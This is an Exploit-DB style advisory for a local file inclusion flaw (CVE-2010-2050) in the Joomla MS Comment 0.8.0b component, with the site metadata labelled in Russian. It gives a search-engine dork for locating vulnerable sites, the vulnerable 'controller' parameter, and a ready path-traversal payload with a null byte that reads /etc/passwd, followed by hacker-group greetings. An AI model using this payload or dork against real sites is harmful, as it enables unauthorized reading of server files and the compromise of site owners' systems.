Exploit Joomla! Component MS Comment 0.8.0b - Local File Inclusion

[Exploiter]

EDB-ID

12611

Проверка EDB

1. Пройдено

Автор

XR0B0T

Тип уязвимости

WEBAPPS

Платформа

PHP

CVE

cve-2010-2050

Дата публикации

2010-05-15

[!]===========================================================================[!]

[~] Joomla Component MS Comment LFI Vulnerability 
[~] Author	: Xr0b0t ([email protected])
[~] Homepage	: http://www.indonesiancoder.com | http://Xr0b0t.name | http://Malangcyber.com
[~] Date	: 16 Mei, 2010

[!]===========================================================================[!]

[ Software Information ]

[+] Price : free
[+] Vulnerability : LFI
[+] Dork : inurl:"com_mscomment" ;)
[+] Version : 0.8.0b maybe lower also affected 

[!]===========================================================================[!]

[ Vulnerable File ]

http://127.0.0.1/index.php?option=com_mscomment&controller=[INDONESIANCODER]

[ XpL ]

../../../../../../../../../../../../../../../etc/passwd%00


etc etc etc ;]

[!]===========================================================================[!]

[ Thx TO ]

[+] kaMtiEz dulurku seng paling ganteng, endi kok ra rene
[+] INDONESIAN CODER TEAM IndonesianHacker Malang CYber CREW Magelang Cyber
[+] tukulesto,M3NW5,arianom,N4CK0,abah_benu,d0ntcry,bobyhikaru,gonzhack,senot
[+] Contrex,YadoY666,Pathloader,cimpli,MarahMerah.IBL13Z,r3m1ck,Geni212
[+] Coracore,Gh4mb4s,Jack-,VycOd,m0rgue,otong,CS-31,Yur4kha


[ NOTE ]

[+] OJOK JOTOS2an YO ..
[+] Minggir semua Arumbia Team Mau LEwat ;)
[+] MBEM : lup u :">

[ QUOTE ]

[+] INDONESIANCODER still r0x...
[+] ARUmBIA TEam Was Here Cuy MINGIR Kabeh KAte lewat ..
[+] Malang Cyber Crew & Magelang Cyber Community